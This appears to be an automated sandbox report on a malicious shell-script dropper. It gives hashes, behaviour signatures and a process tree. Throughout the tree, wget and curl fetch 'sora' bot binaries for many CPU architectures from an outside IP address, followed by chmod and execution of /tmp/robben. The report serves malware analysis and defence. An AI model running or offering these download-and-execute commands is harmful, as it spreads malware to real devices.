Analysis
-
max time kernel
28s -
max time network
29s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
18/10/2024, 02:04
Static task
static1
Behavioral task
behavioral1
Sample
7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
-
Size
2KB
-
MD5
5d873bf46fd4ff411eb17e42d5ae2980
-
SHA1
fd73b1bb3b7241d68fcaac4f4bf9cc6164b6fa06
-
SHA256
7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d
-
SHA512
f58f94eaa5f9440db6b1c41915be89331d7355904631d3ede46adfd517e493b3e49979d0ad0a535d8d6181ac81e0d19d6ba0dcb33765b54bbc16830828cc6382
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 776 chmod 804 chmod 836 chmod 881 chmod 794 chmod 820 chmod 855 chmod 869 chmod 875 chmod 923 chmod 765 chmod 788 chmod 782 chmod 911 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 766 robben /tmp/robben 777 robben /tmp/robben 783 robben /tmp/robben 789 robben /tmp/robben 795 robben /tmp/robben 805 robben /tmp/robben 821 robben /tmp/robben 837 robben /tmp/robben 857 robben /tmp/robben 870 robben /tmp/robben 876 robben /tmp/robben 882 robben /tmp/robben 912 robben /tmp/robben 924 robben -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 769 wget 772 curl 775 cat -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/robben 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
Processes
-
/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh1⤵
- Writes file to tmp directory
PID:740 -
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x862⤵PID:743
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x862⤵
- Reads runtime system information
PID:753
-
-
/bin/catcat sora.x862⤵PID:763
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd2⤵
- File and Directory Permissions Modification
PID:765
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:766
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mips2⤵
- System Network Configuration Discovery
PID:769
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:772
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:775
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd2⤵
- File and Directory Permissions Modification
PID:776
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:777
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x86_642⤵PID:779
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x86_642⤵
- Reads runtime system information
PID:780
-
-
/bin/catcat sora.x86_642⤵PID:781
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd2⤵
- File and Directory Permissions Modification
PID:782
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:783
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i4682⤵PID:785
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i4682⤵
- Reads runtime system information
PID:786
-
-
/bin/catcat sora.i4682⤵PID:787
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd2⤵
- File and Directory Permissions Modification
PID:788
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:789
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i6862⤵PID:791
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i6862⤵
- Reads runtime system information
PID:792
-
-
/bin/catcat sora.i6862⤵PID:793
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd2⤵
- File and Directory Permissions Modification
PID:794
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:795
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mpsl2⤵PID:797
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mpsl2⤵
- Reads runtime system information
PID:798
-
-
/bin/catcat sora.mpsl2⤵PID:802
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd2⤵
- File and Directory Permissions Modification
PID:804
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:805
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm42⤵PID:807
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm42⤵
- Reads runtime system information
PID:811
-
-
/bin/catcat sora.arm42⤵PID:818
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:821
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm52⤵PID:824
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm52⤵
- Reads runtime system information
PID:828
-
-
/bin/catcat sora.arm52⤵PID:833
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd2⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:837
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm62⤵PID:839
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm62⤵
- Reads runtime system information
PID:843
-
-
/bin/catcat sora.arm62⤵PID:852
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd2⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:857
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm72⤵PID:859
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm72⤵
- Reads runtime system information
PID:863
-
-
/bin/catcat sora.arm72⤵PID:868
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:870
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc2⤵PID:872
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc2⤵
- Reads runtime system information
PID:873
-
-
/bin/catcat sora.ppc2⤵PID:874
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:876
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc440fp2⤵PID:878
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc440fp2⤵
- Reads runtime system information
PID:879
-
-
/bin/catcat sora.ppc440fp2⤵PID:880
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:882
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.m68k2⤵PID:884
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.m68k2⤵
- Reads runtime system information
PID:901
-
-
/bin/catcat sora.m68k2⤵PID:909
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:912
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.sh42⤵PID:914
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.sh42⤵
- Reads runtime system information
PID:918
-
-
/bin/catcat sora.sh42⤵PID:922
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:924
-